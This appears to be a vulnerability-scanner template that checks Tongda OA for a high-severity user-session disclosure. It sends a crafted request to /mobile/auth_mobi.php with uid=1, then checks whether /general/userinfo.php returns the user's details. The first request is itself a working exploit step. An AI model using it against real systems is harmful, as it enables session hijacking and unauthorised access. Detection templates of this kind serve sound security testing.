id: tongda-user-session-disclosure

info:
    name: Tongda User Session Disclosure
    author: kzaopa(https://github.com/kzaopa)
    severity: high

rules:
    r0:
        request:
            method: GET
            path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
        expression: "true"
    r1:
        request:
            method: POST
            path: /general/userinfo.php?UID=1
        expression: response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json")
expression: r0() && r1()
